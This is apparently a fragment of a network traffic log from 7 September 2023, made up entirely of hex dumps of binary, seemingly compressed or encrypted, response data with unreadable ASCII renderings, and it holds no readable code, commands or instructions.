                                                                                                                      2023-09-07 16:19:24 UTC2344INData Raw: 39 4c 5a c4 41 be 9d cc 52 31 0e af 36 6f 41 ce ad 9b c6 a9 b7 ee 27 3b 7e 37 a5 dc c4 58 16 b9 13 d0 52 7d 50 13 6f 2f f6 f1 39 13 70 44 d3 5d ad 2c aa 05 9c b6 36 66 c5 54 c0 b6 66 d5 3a 7a 7b ce 5c 47 23 31 54 71 a4 d9 61 63 c0 30 71 f3 90 3f 2c c0 08 f1 f5 64 93 58 3d 8c 1d ca 29 b5 fd 5b 56 19 47 ce cb 71 cc 9d a9 57 06 20 ca 85 21 c2 88 7a f7 a5 f9 8a f9 cd a6 35 e3 56 7b 31 57 a1 62 ec 5a 96 f4 32 90 23 7d 73 1a df 8a 2f 26 cd 7c 02 0f c1 d7 a5 45 5a ac 30 43 49 63 11 00 d0 08 40 79 dc 1e 69 ce 0e f2 5f 38 ae 0c 1b 31 1f 70 31 18 e0 5b ba ec 42 73 22 12 7e 6d 59 36 2b b0 47 1a 9c cd 85 62 3a 85 bc b0 eb 9b ec c5 7e 3e d3 69 86 6e 4c 07 a9 b9 99 68 bb 61 75 11 04 d2 7e 61 ee 69 0a 90 f0 e1 39 0b 69 8a 7e 67 a9 5b 99 16 eb 59 b7 76 57 e3 48 38 c1 34
                                                                                                                      Data Ascii: 9LZAR16oA';~7XR}Po/9pD],6fTf:z{\G#1Tqac0q?,dX=)[VGqW !z5V{1WbZ2#}s/&|EZ0CIc@yi_81p1[Bs"~mY6+Gb:~>inLhau~ai9i~g[YvWH84
                                                                                                                      2023-09-07 16:19:24 UTC2351INData Raw: 79 0b bf 66 50 d7 63 b9 26 3c ea fc a7 a8 7e 1d d6 57 60 5a 17 ff d1 87 96 56 a2 0f d6 b2 9c 05 0c 47 20 ec 58 c5 1b 2a 90 7c 29 6f 36 25 7c 0f 2b ae 1d 59 f7 fe 48 2e 4e 91 a0 5c 4d 33 a0 95 e8 ed bc bf 0d c4 f1 ea 56 0c 21 ce df 49 17 e2 d0 b4 36 8e dd 93 a7 58 e3 7b f2 35 b0 27 9f 30 9c a4 27 95 cd 19 b3 07 7f 7d b3 28 18 71 8d c6 30 55 b3 e9 ab 0f f0 0a 94 7e 4e 3e f6 93 f5 8f c3 4e 73 c3 ae de a5 b0 d3 fc a8 a1 30 1b 76 9a 23 df ad 9d da ec 39 1b fe c3 e5 03 20 19 4d 5d dd b5 a4 d9 d3 b3 eb 89 94 1f 83 64 64 7f 7b de d6 80 fb b0 fc 75 18 b7 b5 30 6e d3 fa 23 7f f9 22 d2 74 5b 0d d0 91 80 6f 39 9f df 65 17 a8 07 f2 26 bb 99 46 c5 b1 ff 1a 94 fb ea ff 0c e3 36 03 1d 99 e8 f4 e0 ac 89 72 aa 32 f8 b2 05 83 2b 9c c4 20 6b ff e8 02 cc 9c 89 0d 8c 78 00 1b
                                                                                                                      Data Ascii: yfPc&<~W`ZVG X*|)o6%|+YH.N\M3V!I6X{5'0'}(q0U~N>Ns0v#9 M]dd{u0n#"t[o9e&F6r2+ kx
                                                                                                                      2023-09-07 16:19:24 UTC2359INData Raw: 60 84 71 48 7c d7 10 e7 28 3a 5e 1f bf 1d 01 fc ca 80 c7 4e a9 43 d2 b1 7e 9a 51 7f 92 51 ff d4 51 8c 29 ce ff a2 09 a3 0c d9 d8 d0 79 ec ee 34 76 98 3c b3 07 01 af 29 de 15 a0 56 f8 cd 25 82 30 85 9d e0 5b be 67 2a 91 44 76 3c ae 41 72 b5 a2 06 e9 ab cf 00 d6 cf 27 0d 52 bf 7c 2d 9b 02 1f 30 55 53 f4 40 f1 15 89 62 a8 02 6b d9 e5 d1 51 fa d8 e5 49 61 de 41 e9 b9 c6 e1 a3 d7 e3 1e 57 97 1e 1b b7 ab 34 c5 a8 45 e7 7f 6b 0f dc 8d ba 2b cb ff da ed be ef eb 98 1b 64 06 75 38 1d 3b 2c c3 37 fe 55 a7 b5 ad 5b 6c bb 4a 81 29 b6 1b 1e 0f 8d 75 16 56 ea a8 3d 2d 3f 4a 04 95 ff 67 89 28 ec 6a ab e9 50 56 87 f3 56 f1 ba 12 b4 03 52 96 01 80 07 b6 23 0c 95 4f 1b 30 c8 d8 bf 4b 07 08 ea 3c 29 7c 81 d1 ff 74 36 1e 93 d7 69 25 29 cb cb b6 1b fd 07 cd fe db c9 4c e6 b9
                                                                                                                      Data Ascii: `qH|(:^NC~QQQ)y4v<)V%0[g*Dv<Ar'R|-0US@bkQIaAW4Ek+du8;,7U[lJ)uV=-?Jg(jPVVR#O0K<)|t6i%)L
                                                                                                                      2023-09-07 16:19:24 UTC2367INData Raw: 86 d2 dc 10 60 fd a0 3b df 59 fe 83 9c 8d e9 52 cd df e3 30 a6 41 c5 47 f2 d3 1f 30 20 4c d3 37 a4 71 c7 18 08 fb b0 9d bb d3 1f 89 3e 60 1b c4 63 81 b7 f0 bd 63 aa 77 10 cd fe 06 09 ae 34 75 9b 7d 09 5b 44 dd 2d 49 93 ea 17 4f 58 4a 8d c9 13 96 c0 43 5d 76 2e e1 07 9e a0 fc ae 06 40 2c 0f 2b 39 97 da 46 5e 77 fa b0 d8 78 77 85 f9 ae cf 78 d7 c7 b7 3f 61 42 93 8e 1d 2e 32 5f b7 af 18 79 5d b6 af 19 b9 5a 19 89 3e 40 4c d9 60 1e 00 0e d4 ce 9d 9f 2e ed c0 a8 8b 31 3b 34 12 b3 d1 1c 65 ca d3 e9 db b3 b0 b9 7b 61 56 32 f5 0d 59 fa c6 2c 3e f1 09 23 26 a0 a7 57 4d 1f 1b 93 ac ba 07 93 fc b3 12 cc 9e 0f a8 e9 c3 74 28 de 3e 60 0b 5d ba 4f 23 4d bd 8f 14 2c 19 7c 7c 10 e4 f3 d2 79 a3 be 27 39 24 30 2a d7 23 f0 25 e9 c5 41 ad fa 39 23 eb 6d 96 fe 9b 17 88 7b ca
                                                                                                                      Data Ascii: `;YR0AG0 L7q>`ccw4u}[D-IOXJC]v.@,+9F^wxwx?aB.2_y]Z>@L`.1;4e{aV2Y,>#&WMt(>`]O#M,||y'9$0*#%A9#m{
                                                                                                                      2023-09-07 16:19:24 UTC2375INData Raw: d1 b0 18 0a 95 65 c5 ae fe 37 f1 0e e8 ae b3 ec 55 c0 d5 70 5e 31 6f 9f 43 fa 9f 70 72 d8 81 dc 87 b4 f7 c9 67 c8 e2 f7 95 af 62 39 2c 04 45 c2 72 ac fa 33 a3 6a 61 64 58 2c 7f f3 7e 43 81 be a7 0e 6a 87 c8 c3 d7 00 0b d8 84 43 79 00 b9 3f bc 71 35 b0 55 21 3c 1a de b3 08 0a f8 56 98 b0 75 b5 0d 5b 13 00 91 62 5f 85 0f 5c 4c df 99 ba 04 c7 04 6e 0b e3 df 6b d8 d8 f2 84 fb ec 42 68 f7 62 1a 6b c7 a8 45 88 c7 ce 96 d8 31 9d 48 9e 1d f3 bb b8 1a f2 4a 1b a7 35 94 8e 98 8b b3 0f 5c fd ac 5d 2d 19 0a b2 e1 da d3 f2 74 69 6f da 55 ac 39 d2 65 0b db 56 cd 6a 89 7e 6c 3b f1 89 ed 0b 56 32 84 96 0c 9f 5e e9 64 f0 ba e1 f7 04 e2 ef 49 f4 78 c2 60 c7 e4 cf 57 f9 2e 9a 7e bc 63 e6 bb e4 3f 2e 8f 87 c4 db 3c 0e b5 3d 39 14 21 77 f3 e4 72 e0 07 b1 be 63 53 f2 c1 77 30
                                                                                                                      Data Ascii: e7Up^1oCprgb9,Er3jadX,~CjCy?q5U!<Vu[b_\LnkBhbkE1HJ5\]-tioU9eVj~l;V2^dIx`W.~c?.<=9!wrcSw0
                                                                                                                      2023-09-07 16:19:24 UTC2383INData Raw: bd f5 76 7e 25 11 07 64 68 dd f3 fc 37 21 69 0e 24 59 e2 6a cb 88 10 b1 b2 c5 a1 53 8c 94 61 4c e9 c0 32 17 6e e3 29 14 53 06 31 e5 af 46 ca 19 56 06 df 3a 66 a4 0c 62 4a 09 a6 74 1a 29 a7 31 05 41 80 fe d6 48 19 10 22 37 a2 90 fe 6f f3 f1 3a 62 37 fd 7e 75 82 c9 bd c3 cc 53 da 6f e3 01 96 e2 17 7a d0 a2 8f 17 df 6d 14 ff 6a b2 b8 64 14 0f 26 8a e3 42 fc 1d c6 ff 70 6f 6e 51 99 d4 58 01 40 9e 82 a0 5c aa 79 8e c3 76 51 2f 8a cd 37 a9 8f c1 b9 9e ae bb e8 c3 d9 78 40 1d f7 6b 65 12 fd d3 1c 36 33 ed 1d 9a 05 d5 3d db 7b 60 ed b8 1e e7 8b 88 bb dc 02 50 cb 61 01 5e 7a f4 1f 69 48 87 e8 4a 3f b2 e9 2f 52 3f 74 6a 5e 60 ac 28 30 1a 99 83 5c d0 5e 9c 68 3f 14 fc 9f dc 44 2f bf cc 0c ab e3 42 e4 5a 56 e0 f9 6f b2 02 f8 f2 9e 64 99 bb 58 99 91 44 19 e1 91 64 99
                                                                                                                      Data Ascii: v~%dh7!i$YjSaL2n)S1FV:fbJt)1AH"7o:b7~uSozmjd&BponQX@\yvQ/7x@ke63={`Pa^ziHJ?/R?tj^`(0\^h?D/BZVodXDd
                                                                                                                      2023-09-07 16:19:24 UTC2390INData Raw: a3 04 3d cf da 0c cc af 0e 94 10 59 66 c5 2b 1b d8 48 3e 1b 40 71 6a 43 a6 bb a7 21 9d f4 68 ca 30 39 ac b5 d8 30 f8 aa d7 cc 00 ad 5f de 51 cc 1c e0 e6 b8 4e 11 cf 88 e5 53 72 39 2b 6e 28 e5 b4 e4 98 22 0e 38 05 72 42 41 7a f8 7c 1a 4a c0 f3 60 5a 46 e6 5c 22 d0 bc 32 72 53 60 84 bc 3d a7 9f f4 58 f0 46 79 90 bc 9d 15 b0 aa 1d ba 7a 54 77 bf 2d 6f ff ab 09 15 84 dd 3d f2 f6 53 08 db 47 e4 1d c7 f8 d5 2f 9a c6 60 48 c9 c5 b0 b5 97 10 65 38 4f c1 33 47 ed 31 65 1d c0 26 a1 cf ca 14 60 cb 61 63 1c 8b 4d c3 e6 ab 83 d4 cf 9b d7 3c 34 6f 04 c6 3e 67 3f 94 8a 4d 61 fe 44 cf 68 18 b0 d1 4e 8e 11 19 20 ba 42 04 7a ae 42 ca a8 b0 2a d3 f0 f6 aa c2 46 be 05 60 95 a3 b5 0c c7 ae 99 98 90 d1 0b 49 72 1b f3 53 0b 4f 9e e1 3f 0b c2 14 41 6e eb e3 72 73 12 18 26 9b 45
                                                                                                                      Data Ascii: =Yf+H>@qjC!h090_QNSr9+n("8rBAz|J`ZF\"2rS`=XFyzTw-o=SG/`He8O3G1e&`acM<4o>g?MaDhN BzB*F`IrSO?Anrs&E
                                                                                                                      2023-09-07 16:19:24 UTC2398INData Raw: de 02 e4 e4 28 8a 4d e6 23 a4 6e 5e 04 dc a0 bc 6b d5 95 3a 3c 92 4c 90 b4 7a f5 6a 3e 17 51 cf 48 35 9f 9f fa a7 7e 8a 4c d5 d8 11 ac 3f b2 82 54 16 b8 57 9d 97 db bf 82 ed 54 16 ba 57 5d 92 db 43 e8 b6 ff b5 59 6a 87 28 bf d6 6c 22 7d 79 9f 02 1b e4 0d d2 a2 7c bc 06 90 db ee e0 f9 c4 37 12 a4 df bc 79 4c 77 1d 1d fa 17 e4 7c 17 d3 07 ff c4 19 62 b9 6d 2a ec c2 f0 62 e4 b6 17 7d 37 4d c0 4e 45 cb ac 5a 06 1e 23 2b d0 f4 a8 d7 24 f0 5a e4 d7 2a 4c 79 5d 25 7e ea 84 9a 7a cb f2 5f fc 71 b9 b0 17 bb 4c 2a ce ef c1 0e 6b 65 05 a4 e2 92 56 56 08 63 a8 df f2 70 99 e0 af a1 b5 fd 57 0c 5a c5 82 5e 4f 8e d6 15 85 ae 28 e9 e4 1c a9 1d 45 bf 4a a9 f0 4d 14 d4 80 28 53 7b 6d a8 3f 09 fc c0 87 88 d3 4f 41 27 ff fc 06 b7 28 1d c3 89 7b e8 0a f6 b3 26 44 bf f3 74 9a
                                                                                                                      Data Ascii: (M#n^k:<Lzj>QH5~L?TWTW]CYj(l"}y|7yLw|bm*b}7MNEZ#+$Z*Ly]%~z_qL*keVVcpWZ^O(EJM(S{m?OA'({&Dt
                                                                                                                      2023-09-07 16:19:24 UTC2406INData Raw: 43 91 21 e1 50 6c 92 58 c8 8f dc dc 1c 14 0b a5 44 d1 8c 4f 07 e2 ce 5b 42 e0 d3 fa a4 71 d3 54 28 7c 6b 08 d0 08 7b 9a cc e0 1d fd f6 d5 0c 9e 1d 43 c6 a2 ec 68 33 23 ca 87 c9 49 7a ef b7 13 b2 a3 51 d2 67 a8 8f 03 59 a5 30 73 07 51 f5 c5 f5 fa 36 85 71 67 b7 41 49 d7 79 ef 78 e1 8a 44 e1 96 51 0c 0e 71 43 fd 33 0a 67 07 47 69 ca b7 27 df 53 bf f3 17 56 d4 02 fc 16 97 2e 1d a0 1f 90 09 ea 2b f3 8f 4f 92 2e 9d 97 db 9f 66 6e 68 c6 d0 5a df cf 25 7a 78 e3 72 ed 8e 14 21 96 6d e8 d2 a9 71 31 b2 c4 c8 63 9a 42 d3 06 b8 28 47 79 77 8f 04 bb 87 fe f7 31 43 b4 53 1c b6 d1 eb 09 d7 49 0b 42 35 b3 9f c4 b6 63 69 ba 57 34 a2 55 5e 13 36 a1 d2 15 bd 79 2a b3 6f 1c 20 a5 28 b8 e8 6f 3f 95 90 ec b4 13 26 d9 d9 12 ae a7 03 4f 19 d5 ba d1 6f ed 29 46 18 bb f6 31 99 d1
                                                                                                                      Data Ascii: C!PlXDO[BqT(|k{Ch3#IzQgY0sQ6qgAIyxDQqC3gGi'SV.+O.fnhZ%zxr!mq1cB(Gyw1CSIB5ciW4U^6y*o (o?&Oo)F1
                                                                                                                      2023-09-07 16:19:24 UTC2414INData Raw: 7e 70 d1 f0 f0 f9 36 dd 65 33 26 04 43 b2 fc 19 2a 8b 3d 45 ca 18 d0 1e a0 95 56 8e ed d8 34 34 26 a7 61 45 62 1a 0e d0 3f 5a d9 d5 29 77 12 9f 40 25 e4 53 d7 29 64 c8 94 51 c4 27 de f1 d9 20 dd 2a 9d 22 b7 fd 20 81 46 3e 49 fc e8 4c e0 93 8c 04 3e f9 39 c7 27 23 81 24 3e f1 7e 21 3e 79 b9 c8 c0 27 87 c6 f1 c9 c9 0c 36 73 bf b2 20 3e 99 6e 45 7c 82 56 4c 73 32 26 ce dc 21 fa fb 8c 7f c6 27 c9 29 93 b7 7f cd 22 08 57 4d db ec 8b 06 1a 39 44 9f 85 97 eb 9f 7c 14 2b 8a fd 0b 80 c1 5e b6 45 12 e0 9b 3e 01 8d 1c a2 cb 32 18 1a f9 41 e6 84 25 91 b7 4f f9 e7 fa bf 1e 37 96 e5 18 cd 91 13 62 b3 21 8e ce 50 65 88 4b 37 fb 26 4a b4 9f f6 a3 cf 0f cd 17 8f 31 2b 08 2b 32 3d 33 50 8d d3 94 90 b3 7c f0 6f ac d3 77 e0 f6 e1 ef e3 2a 72 c1 c4 57 18 6a e0 8e 89 3b d0 6a
                                                                                                                      Data Ascii: ~p6e3&C*=EV44&aEb?Z)w@%S)dQ' *" F>IL>9'#$>~!>y'6s >nE|VLs2&!')"WM9D|+^E>2A%O7b!PeK7&J1++2=3P|ow*rWj;j
                                                                                                                      2023-09-07 16:19:24 UTC2422INData Raw: 6b 22 42 7e a2 09 24 37 ea d5 53 64 34 65 a2 c5 16 55 3f 58 9c 63 91 38 3c 74 7e 92 1e ca be 0c d9 2a a2 81 75 2f 6d a1 db c8 c5 3a 2f 0c dd bc eb 8d 2d 74 fb 3b f3 db da a6 ae c3 49 4d f4 a3 d3 35 a7 33 87 94 31 e8 14 6a d4 8e 74 cd 76 72 93 01 5e 32 01 e0 50 16 1a 36 5c 09 ac c7 04 08 ca f4 01 83 83 c9 90 ae ec ca d2 93 52 51 ab 69 0c 7b a0 5f c7 53 a9 6a 8c 5e 31 58 18 79 49 8e a5 1c aa cc bc 42 db 85 bf 88 39 eb 38 1f 3a b7 83 e4 c7 a9 91 6d 68 be b8 11 96 6d 18 96 74 35 94 63 8d f3 8d 4c f4 3f 18 5f 86 2d 6e a5 9f 7a 31 13 da fa 57 8e d1 bb 11 aa a9 5c 1f 57 5b 14 37 99 99 8e e4 15 f3 b5 38 e2 66 85 5c 85 aa bb 16 fa 66 51 ea e8 9b 95 be 59 95 ef 5e 85 e7 5f b6 2f 51 c1 f5 5c 75 89 6f 6e fd 9e e9 24 6a df 3e 7f 65 62 49 fd d9 cc 09 8a 5d a8 8b 56 10
                                                                                                                      Data Ascii: k"B~$7Sd4eU?Xc8<t~*u/m:/-t;IM531jtvr^2P6\RQi{_Sj^1XyIB98:mhmt5cL?_-nz1W\W[78f\fQY^_/Q\uon$j>ebI]V
                                                                                                                      2023-09-07 16:19:24 UTC2429INData Raw: 81 85 2b fc 52 e9 37 01 7d f0 e3 27 ce 3e a9 74 1d 71 f6 4a a5 0f e3 96 bd 74 3d aa bb 95 86 88 d3 26 95 d6 4a 6b 37 4a 3f 44 b2 97 7e 48 55 17 0e 93 6d f4 6d 1b b2 15 42 d5 19 a4 6d da d9 63 e8 2a f9 fb 48 d1 62 aa 2a df c3 89 f7 8c aa 78 ae 92 f3 34 53 e4 38 12 fc 04 88 a0 b4 00 4d 82 ca 61 42 d3 51 06 ee bc 58 5a 68 c7 90 37 67 60 31 d0 05 e1 82 f8 89 f8 22 dc fb f4 02 11 cd f5 a2 bb 26 c9 d3 27 79 06 f1 f6 da 83 81 d0 25 4f 8f e4 39 2d 79 ba 24 cf 51 c9 d3 29 79 0e 38 ee db 18 d4 65 ff e7 f0 be a9 98 cb b7 36 0a 9f 91 67 f7 d3 03 86 56 f2 e4 7e f4 de a4 4d 8d 0c 87 87 13 ba 49 9d d9 71 28 94 14 dd 4b cf 4c d6 cb ae 9e 00 03 db a1 4c c9 a9 a8 82 4d 59 79 6d 7c c0 17 d3 18 05 99 b2 ab 0b d2 55 c1 8a 7a 94 b7 ad 8d 8f 2e 86 0c 42 0d 6c 28 74 5a 15 7a 94
                                                                                                                      Data Ascii: +R7}'>tqJt=&Jk7J?D~HUmmBmc*Hb*x4S8MaBQXZh7g`1"&'y%O9-y$Q)y8e6gV~MIq(KLLMYym|Uz.Bl(tZz
                                                                                                                      2023-09-07 16:19:24 UTC2437INData Raw: e7 69 37 ec 63 95 df 69 3b e6 19 de 40 16 5e fc 25 e1 f5 d9 ca 61 9a 86 01 c5 5c a3 f6 3f af 51 bc bb f0 b2 4f af 67 61 a2 9e 18 2e 17 f6 16 af 4f fe 1e f0 ad ce 40 d2 2a 72 48 72 1e 90 9c 5d 92 f3 a8 72 68 6f 7c a9 97 a9 08 70 54 db be 67 cc c6 43 da a3 74 49 7e 58 13 22 5e d6 73 d6 3e 20 3b bb a8 00 71 40 e9 ef d4 d3 ca 76 26 51 19 09 24 b1 85 81 ac d5 fe fc ca 2e e1 16 e2 ea a4 8a 6a ff d0 af 10 6a af a9 c0 1b 7c 4c da 78 00 56 e2 c1 dc 73 9a 7f 73 3c 0c 8a 26 ed c6 1f fd 60 f5 64 1b b5 10 24 ed da 3d e6 e3 6f 41 d7 26 ef 19 a8 4c aa cd c3 6c c6 31 56 73 3b 86 0d c8 17 b8 e0 cd 30 e8 a8 44 16 ee 16 b2 e9 e9 a9 93 1b 19 81 4d 7f a7 72 cf cd 74 a7 78 19 12 d5 b1 0a e5 0e 78 9d ec ee 22 ce fb c7 37 ac 54 c3 aa fe ae 65 4b 96 2f e6 c3 18 dd ac 7e 13 5b e6
                                                                                                                      Data Ascii: i7ci;@^%a\?QOga.O@*rHr]rho|pTgCtI~X"^s> ;q@v&Q$.jj|LxVss<&`d$=oA&Ll1Vs;0DMrtxx"7TeK/~[
                                                                                                                      2023-09-07 16:19:24 UTC2445INData Raw: ff 34 0c 84 e7 28 25 9d 2e 18 0b f8 e4 f6 52 af f7 39 d4 cf 5c 16 fd d8 03 1f 69 b2 85 3a 62 e3 94 27 46 e9 c7 f8 89 99 e2 fa 11 a5 14 18 c7 cb 50 65 91 ee 78 f1 14 e0 ed bb 51 7a b2 ac 24 87 e3 98 fa 84 62 ad 67 c2 a2 16 8b 1f 14 d9 9a 34 92 d2 d7 6f c5 30 71 fd d6 45 26 6d e7 44 8d 7a 4f ad a5 6d 6a db aa 5d ef 21 f6 0c 01 8b d2 92 62 64 7e be 1d de ca 25 ba 8d d4 f6 8e ee 72 7d c3 09 7b 2a 7d 23 56 19 b7 09 f0 6b 9f 08 e3 48 7a 0d ca 09 e5 5a 11 7c 7f 05 df 0b 03 ac 96 b2 0b 47 ca 1d 60 f5 aa 12 63 a6 57 e8 8f 57 38 7d bc 42 04 24 94 b4 fb 06 d4 da 3e ae e7 6b ad 9b b4 03 fc 47 62 07 88 26 14 d3 a4 89 fe d2 e6 56 90 13 1d ce be 24 60 ec 9a 43 c8 1e f9 be 02 d8 32 a1 3e e4 e2 b7 15 12 7a 9b 3a 5f 5c fc f6 00 6a 26 2d 7e 1b 17 48 99 7d 1b 67 42 17 3a 87
                                                                                                                      Data Ascii: 4(%.R9\i:b'FPexQz$bg4o0qE&mDzOmj]!bd~%r}{*}#VkHzZ|G`cWW8}B$>kGb&V$`C2>z:_\j&-~H}gB:
                                                                                                                      2023-09-07 16:19:24 UTC2453INData Raw: 2a 17 f0 c2 8f ec 2d 7e 62 82 ef fe 3b 33 0c 55 4d fd 58 7d 74 8a 3e 7c 32 ba be 84 ea cc bc e8 34 30 ff ab 81 ec 8e 3e f6 6f 07 f2 f7 51 d7 ff 62 20 1b a3 d7 3b 2a e7 f0 e2 0e e6 df 8d 1f 05 f0 19 cc f6 af 06 92 0f 95 4d c4 69 f0 41 c0 a7 b9 3a 2d d7 63 ce dd 77 ee 57 6b a2 7e 8a 55 44 a6 03 eb ac 9c 53 75 f7 97 e1 ef 2a fa d1 5a 35 7b 02 12 7f e3 a8 cc aa b2 4c c2 e4 b3 51 66 85 bd 25 3a c3 51 c7 08 66 58 b1 38 74 8d 04 b2 e0 02 fd 37 4f aa 9c 2b d5 59 2a 57 af 5c b5 76 cd 04 8b 10 7d 5b 86 d7 e2 33 0d 18 58 66 e1 fb 2d ef df ca 87 d3 0c 9a ce af 93 73 c4 f8 6d a8 c1 b6 c9 48 62 c4 65 75 74 f2 0d fd ba 23 88 0f 71 b4 22 fc 93 b8 93 45 3d ee ff 81 df 5d f4 54 a9 95 7f 0a 5d d0 3b f6 f1 4f a2 64 76 27 8a 0f fc f7 df d4 ca 35 fe 8e 9e 7b 5a 4c 6d a6 c3 12
                                                                                                                      Data Ascii: *-~b;3UMX}t>|240>oQb ;*MiA:-cwWk~UDSu*Z5{LQf%:QfX8t7O+Y*W\v}[3Xf-smHbeut#q"E=]T];Odv'5{ZLm
                                                                                                                      2023-09-07 16:19:24 UTC2461INData Raw: d0 69 58 de e3 23 de 6b fd e6 cd 7e fa 04 2f e1 94 b4 8d 78 19 a4 09 83 1b f1 30 d8 83 65 83 a1 a8 60 3c 63 ad e8 0f ff de 47 f0 57 0e 99 e2 fb c3 22 eb 62 fd ca e6 12 dc b8 77 97 c3 df d1 0f e9 a2 04 a3 de 36 b5 64 59 3a b3 ac 9a cb 2b b0 8d 38 2a 1e 7b b3 31 83 18 78 e8 5b 83 87 80 5e ac 28 7b e8 2a 24 8e 53 02 fa f1 39 6c 53 7d d2 ce d6 8a 88 d9 9a 0e d9 1a 8f 19 52 0b 19 2f 16 80 6e 05 6f f7 61 9e b1 14 40 80 55 6e 35 05 27 db de 9b 58 15 9d e9 ee aa 1a a4 a2 37 91 77 33 31 46 8c 1c 9c 39 29 51 95 2b 70 99 bb 82 31 85 fc 8f 37 5e d1 e4 57 09 5e c8 ab 9c 98 a3 d0 c2 9e 43 20 61 db d9 42 70 43 46 b8 c1 37 ce 05 88 d1 65 c6 f6 d6 43 2d 00 56 32 4d 93 14 30 30 55 dc af a3 2d d9 96 22 ed 3d 5c 8c ce 6c 9a b6 f6 5e 09 59 04 00 9c b7 f8 f9 35 4d 18 21 b4 e1
                                                                                                                      Data Ascii: iX#k~/x0e`<cGW"bw6dY:+8*{1x[^({*$S9lS}R/noa@Un5'X7w31F9)Q+p17^W^C aBpCF7eC-V2M00U-"=\l^Y5M!
                                                                                                                      2023-09-07 16:19:24 UTC2469INData Raw: 33 92 3b 6d 8d cb 74 83 d2 e0 e7 64 df 16 8f 5e fd f4 94 62 3c 05 bb 71 7c 52 9c 9a 65 52 bc 0b fb 7e 69 d2 d1 8f 3f a3 00 47 86 40 b9 e1 73 5c 80 d0 57 13 78 88 e2 6d a3 40 b5 a9 db d6 58 80 cc aa d7 49 d0 dd d6 84 d4 18 2b 11 69 49 cd b6 a6 a5 38 c6 78 65 99 a8 fa 73 1b f2 33 84 11 ca 33 33 97 2d d3 6b c5 db 9a 5c ba 6d 34 7c 66 06 e6 40 cd 4c 64 b8 8b 4e 6a 10 7d 8e 08 4e d9 9a 90 e1 84 7d 71 2a d7 92 dd 93 52 24 ca f7 2f d4 a8 bd 8e cc 8c 28 e5 7d 4c fb a4 bc 8f 5a 69 ad da a7 79 17 6a 6b 7c fc 6f e7 a2 09 a7 90 21 0c 4c 29 c0 9f 9d 46 cd 20 96 49 52 b2 93 5c a3 1e fc 70 35 66 23 15 64 a1 0c 05 bf 16 46 7a c6 b0 80 04 22 a9 33 32 6e 68 24 6c 28 05 fb 54 a4 4f 8c 8f a4 c7 75 90 fa c8 98 ca d0 8b 3c 14 15 bc 1b 37 ed fc 31 76 64 66 ab 7c f2 b2 dc 1a 05
                                                                                                                      Data Ascii: 3;mtd^b<q|ReR~i?G@s\Wxm@XI+iI8xes333-k\m4|f@LdNj}N}q*R$/(}LZiyjk|o!L)F IR\p5f#dFz"32nh$l(TOu<71vdf|
                                                                                                                      2023-09-07 16:19:24 UTC2476INData Raw: 57 23 93 bd 80 4b 03 a7 da 9c 3f 1f b3 64 12 54 c4 ac 83 c9 5d ae d6 ce 6c 5a 1f f3 3e 76 58 79 30 25 de d3 0f 8c a7 ce 2f 65 a7 6a de 25 c8 07 f6 dd f4 ad 05 41 f4 d4 86 f2 a2 ba 01 b6 03 49 35 75 2b 1e 05 76 07 90 15 98 a8 df 4c d1 ac 4b 04 5b e3 20 1e bb 05 18 3a d5 bb 08 c8 a0 68 a5 6c 51 d8 51 b1 84 a8 2e b4 2b a8 14 7c 01 fe 8b d7 10 39 0c ab 5e 07 4b 68 3a 11 bc 81 d5 61 a4 53 b3 b2 16 78 a6 e1 00 2f 6f 87 d7 33 9b 4e 48 5f b1 ba 01 a8 04 64 10 a0 55 25 43 94 51 fc 97 a8 e6 2f e7 27 44 9d 5e 38 58 c4 53 a1 36 be 90 be 84 da 2c 06 66 dc 74 a2 36 8b 79 53 0a 94 4d c8 fc a1 3a 6f ae 56 3d a7 32 6a 19 ff 27 c6 fd db b0 0c 63 b3 1d e0 9f 44 91 e3 9c d8 e1 7d c8 c4 36 89 b8 53 29 ca 2e d1 4c ec 49 f8 3a f9 43 9d 10 ea 91 26 f1 9c 41 38 79 bb f0 77 38 9a
                                                                                                                      Data Ascii: W#K?dT]lZ>vXy0%/ej%AI5u+vLK[ :hlQQ.+|9^Kh:aSx/o3NH_dU%CQ/'D^8XS6,ft6ySM:oV=2j'cD}6S).LI:C&A8yw8
                                                                                                                      2023-09-07 16:19:24 UTC2484INData Raw: c4 af dc a0 ec 31 e6 1d 4a 97 2a 28 d8 73 a2 e2 7d 5c 05 58 86 98 8c bc ce b5 ea 92 4e af f5 86 4e 40 65 cb 91 cf 1e c2 91 62 e6 44 3d 74 08 c6 aa 9d c3 51 0d 0d 0b 80 43 7a 40 f6 96 44 29 fe e5 68 04 db 8f 9a c6 ce ab a8 80 53 43 45 a3 d9 38 9c a3 c2 9d 54 9e 2d 8c 42 2b 2d 7f 39 36 c4 9b a1 09 f2 90 77 b7 07 af 8f bc f4 f1 f3 02 95 8c 80 2d e9 67 9a 76 b5 20 05 6d 9c b2 2a c8 57 94 f8 a3 07 1e 2f f0 69 55 25 18 a1 1b 01 b6 4e 0a 65 90 90 dd ca 2e ea 26 8f 78 47 fa 01 bd 94 bd 4b 48 08 2d a3 f9 75 db 34 2d e0 e7 d5 03 c4 28 d9 f1 7f 78 75 13 7f 64 80 50 58 39 6e 06 06 56 ea 87 5a 6c bf b6 ba 84 bf 1b 4d 86 0f 8b c2 6e 9e 31 60 98 69 06 69 a9 ed 6c ff 4d 58 d3 87 4b 8d 55 3b 50 1e 38 db f6 d6 15 47 e8 1b 07 eb 88 eb 0c 4e b7 bd 76 1e cd 73 0d 33 8a fd d0
                                                                                                                      Data Ascii: 1J*(s}\XNN@ebD=tQCz@D)hSCE8T-B+-96w-gv m*W/iU%Ne.&xGKH-u4-(xudPX9nVZlMn1`iilMXKU;P8GNvs3
                                                                                                                      2023-09-07 16:19:24 UTC2492INData Raw: be c6 ef 9a f8 f6 88 c0 f0 ea 20 0b 4e d3 d5 41 16 c6 4e 96 d6 af a9 d5 48 11 e8 1b 9f 22 f0 df 60 98 7c f3 f2 d1 25 34 9a ec d5 5d 50 ff 9f 0d fe 60 64 b2 99 17 30 d1 61 2d da 84 8d a4 47 4c c1 a9 23 17 85 56 a0 de 5a 7e 6e 25 25 41 64 47 95 d5 09 28 3d cb 77 8c 0b 9b 65 12 0c ee 0a 8e 09 aa c6 06 32 be 35 a6 05 57 8d a9 20 12 3f 0a 6a f8 b5 9a 39 88 f2 9f df a1 87 8d c8 b3 b0 a3 f2 a3 73 00 e0 c5 d2 57 a3 f7 69 24 40 36 bb 08 dc d9 94 8a 63 bf c5 a0 4e d6 4a 93 bf 88 57 c2 59 92 9f 9a a3 27 9f c7 26 8b 78 36 34 88 0d c1 e9 4f 41 7d 26 e5 94 f7 c3 